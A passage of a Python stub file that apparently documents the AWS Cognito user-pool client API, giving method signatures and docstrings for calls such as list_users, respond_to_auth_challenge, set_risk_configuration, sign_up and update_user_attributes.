    * ``Id`` (string) and ``Name`` (string) of the pool.
    * ``LambdaConfig`` (dict) — the AWS Lambda trigger configuration, with string
      entries ``PreSignUp``, ``CustomMessage``, ``PostConfirmation``,
      ``PreAuthentication``, ``PostAuthentication``, ``DefineAuthChallenge``,
      ``CreateAuthChallenge``, ``VerifyAuthChallengeResponse``,
      ``PreTokenGeneration`` and ``UserMigration``.
    * ``Status`` (string) — ``'Enabled'`` or ``'Disabled'``.
    * ``LastModifiedDate`` and ``CreationDate`` (datetime).

    :type NextToken: string
    :param NextToken:
        An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
    :type MaxResults: integer
    :param MaxResults: **[REQUIRED]**
        The maximum number of results you want the request to return when listing the user pools.
    :rtype: dict
    :returns:
    """
    pass
def list_users(self, UserPoolId: str, AttributesToGet: List = None, Limit: int = None, PaginationToken: str = None, Filter: str = None) -> Dict:
    """
    Lists the users in the Amazon Cognito user pool.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ListUsers>`_

    **Request Syntax**
    ::
        response = client.list_users(
            UserPoolId='string',
            AttributesToGet=[
                'string',
            ],
            Limit=123,
            PaginationToken='string',
            Filter='string'
        )

    The response is a dict with a ``Users`` list and a ``PaginationToken``
    (string). Each user entry contains ``Username`` (string), ``Attributes``
    (list of ``{'Name': 'string', 'Value': 'string'}`` dicts),
    ``UserCreateDate`` / ``UserLastModifiedDate`` (datetime), ``Enabled``
    (boolean), ``UserStatus`` (one of ``UNCONFIRMED``, ``CONFIRMED``,
    ``ARCHIVED``, ``COMPROMISED``, ``UNKNOWN``, ``RESET_REQUIRED``,
    ``FORCE_CHANGE_PASSWORD``), and ``MFAOptions`` (list of dicts with
    ``DeliveryMedium`` — ``'SMS'`` or ``'EMAIL'`` — and ``AttributeName``).

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]**
        The user pool ID for the user pool on which the search should be performed.
    :type AttributesToGet: list
    :param AttributesToGet:
        An array of strings, where each string is the name of a user attribute to be returned for each user in the search results. If the array is null, all attributes are returned.
    :type Limit: integer
    :param Limit:
        Maximum number of users to be returned.
    :type PaginationToken: string
    :param PaginationToken:
        An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
    :type Filter: string
    :param Filter:
        A filter string of the form ``"AttributeName Filter-Type "AttributeValue""``.
        Quotation marks within the filter string must be escaped with a backslash,
        for example ``"family_name = \\"Reddy\\""``.

        * *AttributeName*: the attribute to search for; only one attribute at a time.
        * *Filter-Type*: ``=`` for an exact match, ``^=`` for a prefix ("starts with") match.
        * *AttributeValue*: the attribute value that must be matched for each user.

        If the filter string is empty, ``ListUsers`` returns all users in the user pool.
        Only these standard attributes are searchable: ``username`` (case-sensitive),
        ``email``, ``phone_number``, ``name``, ``given_name``, ``family_name``,
        ``preferred_username``, ``cognito:user_status`` (called **Status** in the
        Console, case-insensitive), ``status`` (called **Enabled** in the Console,
        case-sensitive) and ``sub``. Custom attributes are not searchable.

        For more information, see `Searching for Users Using the ListUsers API <http://docs.aws.amazon.com/cognito/latest/developerguide/how-to-manage-user-accounts.html#cognito-user-pools-searching-for-users-using-listusers-api>`__ and `Examples of Using the ListUsers API <http://docs.aws.amazon.com/cognito/latest/developerguide/how-to-manage-user-accounts.html#cognito-user-pools-searching-for-users-listusers-api-examples>`__ in the *Amazon Cognito Developer Guide*.
    :rtype: dict
    :returns:
    """
    pass
def list_users_in_group(self, UserPoolId: str, GroupName: str, Limit: int = None, NextToken: str = None) -> Dict:
    """
    Lists the users in the specified group.

    Requires developer credentials.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ListUsersInGroup>`_

    **Request Syntax**
    ::
        response = client.list_users_in_group(
            UserPoolId='string',
            GroupName='string',
            Limit=123,
            NextToken='string'
        )

    The response is a dict with a ``Users`` list and a ``NextToken`` (string).
    Each user entry contains ``Username`` (string), ``Attributes`` (list of
    ``{'Name': 'string', 'Value': 'string'}`` dicts), ``UserCreateDate`` /
    ``UserLastModifiedDate`` (datetime), ``Enabled`` (boolean), ``UserStatus``
    (one of ``UNCONFIRMED``, ``CONFIRMED``, ``ARCHIVED``, ``COMPROMISED``,
    ``UNKNOWN``, ``RESET_REQUIRED``, ``FORCE_CHANGE_PASSWORD``), and
    ``MFAOptions`` (list of dicts with ``DeliveryMedium`` — ``'SMS'`` or
    ``'EMAIL'`` — and ``AttributeName``).

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]**
        The user pool ID for the user pool.
    :type GroupName: string
    :param GroupName: **[REQUIRED]**
        The name of the group.
    :type Limit: integer
    :param Limit:
        The limit of the request to list users.
    :type NextToken: string
    :param NextToken:
        An identifier that was returned from the previous call to this operation, which can be used to return the next set of items in the list.
    :rtype: dict
    :returns:
    """
    pass
def resend_confirmation_code(self, ClientId: str, Username: str, SecretHash: str = None, UserContextData: Dict = None, AnalyticsMetadata: Dict = None) -> Dict:
    """
    Resends the confirmation (for confirmation of registration) to a specific user in the user pool.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/ResendConfirmationCode>`_

    **Request Syntax**
    ::
        response = client.resend_confirmation_code(
            ClientId='string',
            SecretHash='string',
            UserContextData={
                'EncodedData': 'string'
            },
            Username='string',
            AnalyticsMetadata={
                'AnalyticsEndpointId': 'string'
            }
        )

    The response is a dict with a ``CodeDeliveryDetails`` dict containing
    ``Destination`` (string), ``DeliveryMedium`` (``'SMS'`` or ``'EMAIL'``) and
    ``AttributeName`` (string) — the code delivery details returned by the
    server for the resent confirmation code.

    :type ClientId: string
    :param ClientId: **[REQUIRED]**
        The ID of the client associated with the user pool.
    :type SecretHash: string
    :param SecretHash:
        A keyed-hash message authentication code (HMAC) calculated using the secret key of a user pool client and username plus the client ID in the message.
    :type UserContextData: dict
    :param UserContextData:
        Contextual data such as the user's device fingerprint, IP address, or location used for evaluating the risk of an unexpected event by Amazon Cognito advanced security. Contains one key, ``EncodedData`` (string).
    :type Username: string
    :param Username: **[REQUIRED]**
        The user name of the user to whom you wish to resend a confirmation code.
    :type AnalyticsMetadata: dict
    :param AnalyticsMetadata:
        The Amazon Pinpoint analytics metadata for collecting metrics for ``ResendConfirmationCode`` calls. Contains one key, ``AnalyticsEndpointId`` (string).
    :rtype: dict
    :returns:
    """
    pass
def respond_to_auth_challenge(self, ClientId: str, ChallengeName: str, Session: str = None, ChallengeResponses: Dict = None, AnalyticsMetadata: Dict = None, UserContextData: Dict = None) -> Dict:
    """
    Responds to the authentication challenge.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/RespondToAuthChallenge>`_

    **Request Syntax**
    ::
        response = client.respond_to_auth_challenge(
            ClientId='string',
            ChallengeName='SMS_MFA'|'SOFTWARE_TOKEN_MFA'|'SELECT_MFA_TYPE'|'MFA_SETUP'|'PASSWORD_VERIFIER'|'CUSTOM_CHALLENGE'|'DEVICE_SRP_AUTH'|'DEVICE_PASSWORD_VERIFIER'|'ADMIN_NO_SRP_AUTH'|'NEW_PASSWORD_REQUIRED',
            Session='string',
            ChallengeResponses={
                'string': 'string'
            },
            AnalyticsMetadata={
                'AnalyticsEndpointId': 'string'
            },
            UserContextData={
                'EncodedData': 'string'
            }
        )

    The response is a dict containing:

    * ``ChallengeName`` (string) — the next challenge name, same value set as the request's.
    * ``Session`` (string) — pass this as-is to the next ``RespondToAuthChallenge`` call if another challenge is returned.
    * ``ChallengeParameters`` (dict of string to string) — the challenge parameters.
    * ``AuthenticationResult`` (dict) — ``AccessToken`` (string), ``ExpiresIn``
      (integer, expiration period in seconds), ``TokenType`` (string),
      ``RefreshToken`` (string), ``IdToken`` (string) and ``NewDeviceMetadata``
      (dict with ``DeviceKey`` and ``DeviceGroupKey`` strings).

    :type ClientId: string
    :param ClientId: **[REQUIRED]**
        The app client ID.
    :type ChallengeName: string
    :param ChallengeName: **[REQUIRED]**
        The challenge name. ``ADMIN_NO_SRP_AUTH`` is not a valid value.
    :type Session: string
    :param Session:
        The session which should be passed both ways in challenge-response calls to the service. If ``InitiateAuth`` or ``RespondToAuthChallenge`` API call determines that the caller needs to go through another challenge, they return a session with other challenge parameters. This session should be passed as it is to the next ``RespondToAuthChallenge`` API call.
    :type ChallengeResponses: dict
    :param ChallengeResponses:
        The challenge responses (string to string). These are inputs corresponding to the value of ``ChallengeName``, for example:

        * ``SMS_MFA``: ``SMS_MFA_CODE``, ``USERNAME``, ``SECRET_HASH`` (if app client is configured with client secret).
        * ``PASSWORD_VERIFIER``: ``PASSWORD_CLAIM_SIGNATURE``, ``PASSWORD_CLAIM_SECRET_BLOCK``, ``TIMESTAMP``, ``USERNAME``, ``SECRET_HASH`` (if app client is configured with client secret).
        * ``NEW_PASSWORD_REQUIRED``: ``NEW_PASSWORD``, any other required attributes, ``USERNAME``, ``SECRET_HASH`` (if app client is configured with client secret).
    :type AnalyticsMetadata: dict
    :param AnalyticsMetadata:
        The Amazon Pinpoint analytics metadata for collecting metrics for ``RespondToAuthChallenge`` calls. Contains one key, ``AnalyticsEndpointId`` (string).
    :type UserContextData: dict
    :param UserContextData:
        Contextual data such as the user's device fingerprint, IP address, or location used for evaluating the risk of an unexpected event by Amazon Cognito advanced security. Contains one key, ``EncodedData`` (string).
    :rtype: dict
    :returns:
    """
    pass
def set_risk_configuration(self, UserPoolId: str, ClientId: str = None, CompromisedCredentialsRiskConfiguration: Dict = None, AccountTakeoverRiskConfiguration: Dict = None, RiskExceptionConfiguration: Dict = None) -> Dict:
    """
    Configures actions on detected risks. To delete the risk configuration for
    ``UserPoolId`` or ``ClientId``, pass null values for all four configuration
    types.

    To enable Amazon Cognito advanced security features, update the user pool to
    include the ``UserPoolAddOns`` key ``AdvancedSecurityMode``.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/SetRiskConfiguration>`_

    **Request Syntax**
    ::
        response = client.set_risk_configuration(
            UserPoolId='string',
            ClientId='string',
            CompromisedCredentialsRiskConfiguration={
                'EventFilter': [
                    'SIGN_IN'|'PASSWORD_CHANGE'|'SIGN_UP',
                ],
                'Actions': {
                    'EventAction': 'BLOCK'|'NO_ACTION'
                }
            },
            AccountTakeoverRiskConfiguration={
                'NotifyConfiguration': {
                    'From': 'string',
                    'ReplyTo': 'string',
                    'SourceArn': 'string',
                    'BlockEmail': {
                        'Subject': 'string',
                        'HtmlBody': 'string',
                        'TextBody': 'string'
                    },
                    'NoActionEmail': {
                        'Subject': 'string',
                        'HtmlBody': 'string',
                        'TextBody': 'string'
                    },
                    'MfaEmail': {
                        'Subject': 'string',
                        'HtmlBody': 'string',
                        'TextBody': 'string'
                    }
                },
                'Actions': {
                    'LowAction': {
                        'Notify': True|False,
                        'EventAction': 'BLOCK'|'MFA_IF_CONFIGURED'|'MFA_REQUIRED'|'NO_ACTION'
                    },
                    'MediumAction': {
                        'Notify': True|False,
                        'EventAction': 'BLOCK'|'MFA_IF_CONFIGURED'|'MFA_REQUIRED'|'NO_ACTION'
                    },
                    'HighAction': {
                        'Notify': True|False,
                        'EventAction': 'BLOCK'|'MFA_IF_CONFIGURED'|'MFA_REQUIRED'|'NO_ACTION'
                    }
                }
            },
            RiskExceptionConfiguration={
                'BlockedIPRangeList': [
                    'string',
                ],
                'SkippedIPRangeList': [
                    'string',
                ]
            }
        )

    The response is a dict with a single ``RiskConfiguration`` dict that echoes
    the stored configuration: ``UserPoolId`` (string), ``ClientId`` (string),
    ``CompromisedCredentialsRiskConfiguration``,
    ``AccountTakeoverRiskConfiguration`` and ``RiskExceptionConfiguration``
    (same shapes as the request parameters above), plus ``LastModifiedDate``
    (datetime).

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]**
        The user pool ID.
    :type ClientId: string
    :param ClientId:
        The app client ID. If ``ClientId`` is null, then the risk configuration is mapped to ``userPoolId`` and the same risk configuration is applied to all the clients in the userPool. Otherwise, ``ClientId`` is mapped to the client; the user pool configuration is overridden and the risk configuration for the client is used instead.
    :type CompromisedCredentialsRiskConfiguration: dict
    :param CompromisedCredentialsRiskConfiguration:
        The compromised credentials risk configuration.

        - ``EventFilter`` (list of strings) — perform the action for these events; the default is to perform all events if no event filter is specified.
        - ``Actions`` (dict) **[REQUIRED]** — the compromised credentials risk configuration actions, with ``EventAction`` (string) **[REQUIRED]**.
    :type AccountTakeoverRiskConfiguration: dict
    :param AccountTakeoverRiskConfiguration:
        The account takeover risk configuration.

        - ``NotifyConfiguration`` (dict) — the notify configuration used to construct email notifications:

          - ``From`` (string) — the sending email address; must be individually verified with Amazon SES, or from a domain verified with Amazon SES.
          - ``ReplyTo`` (string) — the destination to which the receiver of an email should reply to.
          - ``SourceArn`` (string) **[REQUIRED]** — the ARN of the identity associated with the sending authorization policy; it permits Amazon Cognito to send for the email address specified in ``From``.
          - ``BlockEmail`` / ``NoActionEmail`` / ``MfaEmail`` (dicts) — email templates used when a detected risk event is blocked, allowed, or MFA-challenged; each has ``Subject`` (string) **[REQUIRED]**, ``HtmlBody`` (string) and ``TextBody`` (string).
        - ``Actions`` (dict) **[REQUIRED]** — account takeover risk configuration actions. Each of ``LowAction``, ``MediumAction`` and ``HighAction`` has ``Notify`` (boolean) **[REQUIRED]** and ``EventAction`` (string) **[REQUIRED]**, where the event action is one of:

          * ``BLOCK`` — block the request.
          * ``MFA_IF_CONFIGURED`` — throw MFA challenge if user has configured it, else allow the request.
          * ``MFA_REQUIRED`` — throw MFA challenge if user has configured it, else block the request.
          * ``NO_ACTION`` — allow the user sign-in.
    :type RiskExceptionConfiguration: dict
    :param RiskExceptionConfiguration:
        The configuration to override the risk decision.

        - ``BlockedIPRangeList`` (list of strings) — overrides the risk decision to always block the pre-authentication requests; IP ranges in CIDR notation.
        - ``SkippedIPRangeList`` (list of strings) — risk detection is not performed on these IP addresses; IP ranges in CIDR notation.
    :rtype: dict
    :returns:
    """
    pass
def set_ui_customization(self, UserPoolId: str, ClientId: str = None, CSS: str = None, ImageFile: bytes = None) -> Dict:
    """
    Sets the UI customization information for a user pool's built-in app UI.

    You can specify app UI customization settings for a single client (with a
    specific ``clientId``) or for all clients (by setting the ``clientId`` to
    ``ALL``). If you specify ``ALL``, the default configuration will be used for
    every client that has no UI customization set previously. If you specify UI
    customization settings for a particular client, it will no longer fall back
    to the ``ALL`` configuration.

    .. note::
        To use this API, your user pool must have a domain associated with it.
        Otherwise, there is no place to host the app's pages, and the service
        will throw an error.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/SetUICustomization>`_

    **Request Syntax**
    ::
        response = client.set_ui_customization(
            UserPoolId='string',
            ClientId='string',
            CSS='string',
            ImageFile=b'bytes'
        )

    The response is a dict with a ``UICustomization`` dict containing
    ``UserPoolId`` (string), ``ClientId`` (string), ``ImageUrl`` (string, the
    logo image), ``CSS`` (string), ``CSSVersion`` (string), and
    ``LastModifiedDate`` / ``CreationDate`` (datetime).

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]**
        The user pool ID for the user pool.
    :type ClientId: string
    :param ClientId:
        The client ID for the client app.
    :type CSS: string
    :param CSS:
        The CSS values in the UI customization.
    :type ImageFile: bytes
    :param ImageFile:
        The uploaded logo image for the UI customization.
    :rtype: dict
    :returns:
    """
    pass
def set_user_mfa_preference(self, AccessToken: str, SMSMfaSettings: Dict = None, SoftwareTokenMfaSettings: Dict = None) -> Dict:
    """
    Sets the user's multi-factor authentication (MFA) method preference.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/SetUserMFAPreference>`_

    Each settings dict accepts two boolean keys: ``Enabled`` (whether the MFA
    method is turned on) and ``PreferredMfa`` (whether it is the preferred
    method).

    :type AccessToken: string
    :param AccessToken: **[REQUIRED]** The access token.
    :type SMSMfaSettings: dict
    :param SMSMfaSettings: The SMS text message MFA settings
        (``Enabled``/``PreferredMfa`` booleans).
    :type SoftwareTokenMfaSettings: dict
    :param SoftwareTokenMfaSettings: The time-based one-time password
        software token MFA settings (``Enabled``/``PreferredMfa`` booleans).
    :rtype: dict
    :returns: An empty response dictionary (``{}``).
    """
    pass
def set_user_pool_mfa_config(self, UserPoolId: str, SmsMfaConfiguration: Dict = None, SoftwareTokenMfaConfiguration: Dict = None, MfaConfiguration: str = None) -> Dict:
    """
    Sets the user pool MFA configuration.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/SetUserPoolMfaConfig>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID.
    :type SmsMfaConfiguration: dict
    :param SmsMfaConfiguration: The SMS text message MFA configuration, with
        an optional ``SmsAuthenticationMessage`` string and an
        ``SmsConfiguration`` dict containing ``SnsCallerArn``
        (**[REQUIRED]** — the Amazon SNS caller ARN) and an optional
        ``ExternalId`` string.
    :type SoftwareTokenMfaConfiguration: dict
    :param SoftwareTokenMfaConfiguration: The software token MFA
        configuration; a single ``Enabled`` boolean.
    :type MfaConfiguration: string
    :param MfaConfiguration: The MFA configuration; one of
        ``'OFF'``, ``'ON'``, or ``'OPTIONAL'``.
    :rtype: dict
    :returns: A dict echoing the applied configuration, with keys
        ``SmsMfaConfiguration``, ``SoftwareTokenMfaConfiguration``, and
        ``MfaConfiguration`` shaped like the corresponding parameters.
    """
    pass
def set_user_settings(self, AccessToken: str, MFAOptions: List) -> Dict:
    """
    Sets the user settings like multi-factor authentication (MFA). If MFA is
    to be removed for a particular attribute pass the attribute with code
    delivery as null. If null list is passed, all MFA options are removed.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/SetUserSettings>`_

    :type AccessToken: string
    :param AccessToken: **[REQUIRED]** The access token for the set user
        settings request.
    :type MFAOptions: list
    :param MFAOptions: **[REQUIRED]** Specifies the options for MFA
        (e.g., email or phone number). Each element is a dict with
        ``DeliveryMedium`` (``'SMS'`` or ``'EMAIL'`` — the medium used to
        send the MFA code) and ``AttributeName`` (the attribute name of the
        MFA option type).
    :rtype: dict
    :returns: An empty response dictionary (``{}``) from the server for the
        set user settings request.
    """
    pass
def sign_up(self, ClientId: str, Username: str, Password: str, SecretHash: str = None, UserAttributes: List = None, ValidationData: List = None, AnalyticsMetadata: Dict = None, UserContextData: Dict = None) -> Dict:
    """
    Registers the user in the specified user pool and creates a user name,
    password, and user attributes.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/SignUp>`_

    :type ClientId: string
    :param ClientId: **[REQUIRED]** The ID of the client associated with the
        user pool.
    :type Username: string
    :param Username: **[REQUIRED]** The user name of the user you wish to
        register.
    :type Password: string
    :param Password: **[REQUIRED]** The password of the user you wish to
        register.
    :type SecretHash: string
    :param SecretHash: A keyed-hash message authentication code (HMAC)
        calculated using the secret key of a user pool client and username
        plus the client ID in the message.
    :type UserAttributes: list
    :param UserAttributes: An array of name-value pairs representing user
        attributes; each element is a dict with ``Name`` (**[REQUIRED]**)
        and ``Value`` strings. For custom attributes, you must prepend the
        ``custom:`` prefix to the attribute name.
    :type ValidationData: list
    :param ValidationData: The validation data in the request to register a
        user; same ``Name``/``Value`` element shape as ``UserAttributes``.
    :type AnalyticsMetadata: dict
    :param AnalyticsMetadata: The Amazon Pinpoint analytics metadata for
        collecting metrics for ``SignUp`` calls; contains an
        ``AnalyticsEndpointId`` string.
    :type UserContextData: dict
    :param UserContextData: Contextual data such as the user's device
        fingerprint, IP address, or location used for evaluating the risk of
        an unexpected event by Amazon Cognito advanced security; contains an
        ``EncodedData`` string.
    :rtype: dict
    :returns: The registration response: ``UserConfirmed`` (boolean,
        whether the registration has been confirmed), ``CodeDeliveryDetails``
        (dict with ``Destination``, ``DeliveryMedium`` of ``'SMS'`` or
        ``'EMAIL'``, and ``AttributeName``), and ``UserSub`` (the UUID of the
        authenticated user — not the same as ``username``).
    """
    pass
def start_user_import_job(self, UserPoolId: str, JobId: str) -> Dict:
    """
    Starts the user import.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/StartUserImportJob>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID for the user pool that
        the users are being imported into.
    :type JobId: string
    :param JobId: **[REQUIRED]** The job ID for the user import job.
    :rtype: dict
    :returns: A dict with a single ``UserImportJob`` key describing the job:
        ``JobName``, ``JobId``, ``UserPoolId``, ``PreSignedUrl`` (the
        pre-signed URL used to upload the ``.csv`` file), ``CreationDate``,
        ``StartDate``, ``CompletionDate``, ``Status`` (one of ``Created``,
        ``Pending``, ``InProgress``, ``Stopping``, ``Expired``, ``Stopped``,
        ``Failed``, ``Succeeded``), ``CloudWatchLogsRoleArn`` (the role ARN
        for the Amazon CloudWatch Logging role — see "Creating the CloudWatch
        Logs IAM Role" in the Amazon Cognito Developer Guide),
        ``ImportedUsers``, ``SkippedUsers``, ``FailedUsers``, and
        ``CompletionMessage``.
    """
    pass
def stop_user_import_job(self, UserPoolId: str, JobId: str) -> Dict:
    """
    Stops the user import job.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/StopUserImportJob>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID for the user pool that
        the users are being imported into.
    :type JobId: string
    :param JobId: **[REQUIRED]** The job ID for the user import job.
    :rtype: dict
    :returns: A dict with a single ``UserImportJob`` key describing the job:
        ``JobName``, ``JobId``, ``UserPoolId``, ``PreSignedUrl`` (the
        pre-signed URL used to upload the ``.csv`` file), ``CreationDate``,
        ``StartDate``, ``CompletionDate``, ``Status`` (one of ``Created``,
        ``Pending``, ``InProgress``, ``Stopping``, ``Expired``, ``Stopped``,
        ``Failed``, ``Succeeded``), ``CloudWatchLogsRoleArn`` (the role ARN
        for the Amazon CloudWatch Logging role — see "Creating the CloudWatch
        Logs IAM Role" in the Amazon Cognito Developer Guide),
        ``ImportedUsers``, ``SkippedUsers``, ``FailedUsers``, and
        ``CompletionMessage``.
    """
    pass
def tag_resource(self, ResourceArn: str, Tags: Dict = None) -> Dict:
    """
    Assigns a set of tags to an Amazon Cognito user pool. A tag is a label
    that you can use to categorize and manage user pools in different ways,
    such as by purpose, owner, environment, or other criteria.

    Each tag consists of a key and value, both of which you define. A key is
    a general category for more specific values. For example, if you have two
    versions of a user pool, one for testing and another for production, you
    might assign an ``Environment`` tag key to both user pools. The value of
    this key might be ``Test`` for one user pool and ``Production`` for the
    other.

    Tags are useful for cost tracking and access control. You can activate
    your tags so that they appear on the Billing and Cost Management console,
    where you can track the costs associated with your user pools. In an IAM
    policy, you can constrain permissions for user pools based on specific
    tags or tag values.

    You can use this action up to 5 times per second, per account. A user
    pool can have as many as 50 tags.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/TagResource>`_

    :type ResourceArn: string
    :param ResourceArn: **[REQUIRED]** The Amazon Resource Name (ARN) of the
        user pool to assign the tags to.
    :type Tags: dict
    :param Tags: The tags to assign to the user pool, as a mapping of string
        tag keys to string tag values.
    :rtype: dict
    :returns: An empty response dictionary (``{}``).
    """
    pass
def untag_resource(self, ResourceArn: str, TagKeys: List = None) -> Dict:
    """
    Removes the specified tags from an Amazon Cognito user pool. You can use
    this action up to 5 times per second, per account.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/UntagResource>`_

    :type ResourceArn: string
    :param ResourceArn: **[REQUIRED]** The Amazon Resource Name (ARN) of the
        user pool that the tags are assigned to.
    :type TagKeys: list
    :param TagKeys: The keys (strings) of the tags to remove from the user
        pool.
    :rtype: dict
    :returns: An empty response dictionary (``{}``).
    """
    pass
def update_auth_event_feedback(self, UserPoolId: str, Username: str, EventId: str, FeedbackToken: str, FeedbackValue: str) -> Dict:
    """
    Provides the feedback for an authentication event whether it was from a
    valid user or not. This feedback is used for improving the risk
    evaluation decision for the user pool as part of Amazon Cognito advanced
    security.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/UpdateAuthEventFeedback>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID.
    :type Username: string
    :param Username: **[REQUIRED]** The user pool username.
    :type EventId: string
    :param EventId: **[REQUIRED]** The event ID.
    :type FeedbackToken: string
    :param FeedbackToken: **[REQUIRED]** The feedback token.
    :type FeedbackValue: string
    :param FeedbackValue: **[REQUIRED]** The authentication event feedback
        value; either ``'Valid'`` or ``'Invalid'``.
    :rtype: dict
    :returns: An empty response dictionary (``{}``).
    """
    pass
def update_device_status(self, AccessToken: str, DeviceKey: str, DeviceRememberedStatus: str = None) -> Dict:
    """
    Updates the device status.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/UpdateDeviceStatus>`_

    :type AccessToken: string
    :param AccessToken: **[REQUIRED]** The access token.
    :type DeviceKey: string
    :param DeviceKey: **[REQUIRED]** The device key.
    :type DeviceRememberedStatus: string
    :param DeviceRememberedStatus: The status of whether a device is
        remembered; either ``'remembered'`` or ``'not_remembered'``.
    :rtype: dict
    :returns: An empty response dictionary (``{}``) — the response to the
        request to update the device status.
    """
    pass
def update_group(self, GroupName: str, UserPoolId: str, Description: str = None, RoleArn: str = None, Precedence: int = None) -> Dict:
    """
    Updates the specified group with the specified attributes.

    Requires developer credentials.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/UpdateGroup>`_

    :type GroupName: string
    :param GroupName: **[REQUIRED]** The name of the group.
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID for the user pool.
    :type Description: string
    :param Description: A string containing the new description of the group.
    :type RoleArn: string
    :param RoleArn: The new role ARN for the group. This is used for setting
        the ``cognito:roles`` and ``cognito:preferred_role`` claims in the
        token.
    :type Precedence: integer
    :param Precedence: The new precedence value for the group. A nonnegative
        integer that specifies this group's precedence relative to the other
        groups a user can belong to in the user pool. If a user belongs to
        two or more groups, the group with the highest precedence supplies
        the role ARN used in the ``cognito:roles`` and
        ``cognito:preferred_role`` claims in the user's tokens; higher
        ``Precedence`` values take precedence over lower or null values.
        Two groups may share a ``Precedence`` value, in which case neither
        takes precedence over the other: if they have the same role ARN,
        that role is used in the ``cognito:preferred_role`` claim for users
        in each group; if their role ARNs differ, the
        ``cognito:preferred_role`` claim is not set in users' tokens. The
        default ``Precedence`` value is null.
    :rtype: dict
    :returns: A dict with a single ``Group`` key — the group object with
        ``GroupName``, ``UserPoolId``, ``Description``, ``RoleArn``,
        ``Precedence``, ``LastModifiedDate``, and ``CreationDate``.
    """
    pass
def update_identity_provider(self, UserPoolId: str, ProviderName: str, ProviderDetails: Dict = None, AttributeMapping: Dict = None, IdpIdentifiers: List = None) -> Dict:
    """
    Updates identity provider information for a user pool.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/UpdateIdentityProvider>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID.
    :type ProviderName: string
    :param ProviderName: **[REQUIRED]** The identity provider name.
    :type ProviderDetails: dict
    :param ProviderDetails: The identity provider details to be updated, such
        as ``MetadataURL`` and ``MetadataFile``; a string-to-string mapping.
    :type AttributeMapping: dict
    :param AttributeMapping: The identity provider attribute mapping to be
        changed; a string-to-string mapping.
    :type IdpIdentifiers: list
    :param IdpIdentifiers: A list of identity provider identifiers (strings).
    :rtype: dict
    :returns: A dict with a single ``IdentityProvider`` key — the identity
        provider object with ``UserPoolId``, ``ProviderName``,
        ``ProviderType`` (one of ``'SAML'``, ``'Facebook'``, ``'Google'``,
        ``'LoginWithAmazon'``, ``'OIDC'``), ``ProviderDetails``,
        ``AttributeMapping``, ``IdpIdentifiers``, ``LastModifiedDate``, and
        ``CreationDate``.
    """
    pass
def update_resource_server(self, UserPoolId: str, Identifier: str, Name: str, Scopes: List = None) -> Dict:
    """
    Updates the name and scopes of resource server. All other fields are
    read-only.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/UpdateResourceServer>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID for the user pool.
    :type Identifier: string
    :param Identifier: **[REQUIRED]** The identifier for the resource server.
    :type Name: string
    :param Name: **[REQUIRED]** The name of the resource server.
    :type Scopes: list
    :param Scopes: The scope values to be set for the resource server. Each
        element is a resource server scope dict with ``ScopeName``
        (**[REQUIRED]** — the name of the scope) and ``ScopeDescription``
        (**[REQUIRED]** — a description of the scope).
    :rtype: dict
    :returns: A dict with a single ``ResourceServer`` key — the resource
        server with ``UserPoolId`` (the user pool that hosts it),
        ``Identifier``, ``Name``, and ``Scopes`` (a list of
        ``ScopeName``/``ScopeDescription`` dicts).
    """
    pass
def update_user_attributes(self, UserAttributes: List, AccessToken: str) -> Dict:
    """
    Allows a user to update a specific attribute (one at a time).

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/UpdateUserAttributes>`_

    :type UserAttributes: list
    :param UserAttributes: **[REQUIRED]** An array of name-value pairs
        representing user attributes; each element is a dict with ``Name``
        (**[REQUIRED]**) and ``Value`` strings. For custom attributes, you
        must prepend the ``custom:`` prefix to the attribute name.
    :type AccessToken: string
    :param AccessToken: **[REQUIRED]** The access token for the request to
        update user attributes.
    :rtype: dict
    :returns: A dict with a single ``CodeDeliveryDetailsList`` key — a list
        of code delivery details returned by the server, each a dict with
